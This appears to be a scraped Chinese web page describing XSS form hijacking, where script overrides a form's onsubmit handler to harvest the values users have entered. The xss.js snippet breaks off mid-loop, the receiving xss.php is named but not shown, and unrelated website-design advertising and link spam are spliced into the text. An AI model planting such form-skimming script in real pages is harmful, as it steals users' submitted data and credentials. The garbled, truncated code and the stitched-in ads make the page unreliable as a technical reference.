xss表单劫持(from通用明文记录)

大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.

为河津等地区用户提供了全套网页设计制作服务,及河津网站建设行业解决方案。主营业务为网站设计、网站建设、河津网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!

xss.js:

var f=document.forms['from1'];
if(f==undefined)
{
        f=document.getElementById('');
}
var func=f.onsubmit;
f.onsubmit=function(event)
{
	var str='';
	for(var i=0;i

接收端xss.php

参考:

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/


当前文章:xss表单劫持(from通用明文记录)
分享URL:http://bzwzjz.com/article/pshoeo.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 成都网站建设 企业网站设计 成都营销网站制作 成都网站建设 企业网站设计 成都网站建设 成都网站建设 成都网站制作 成都定制网站建设 响应式网站建设 移动手机网站制作 专业网站设计 手机网站制作 成都网站设计 定制网站设计 成都网站设计 营销型网站建设 成都网站建设 成都网站建设 自适应网站设计 网站设计 成都响应式网站建设公司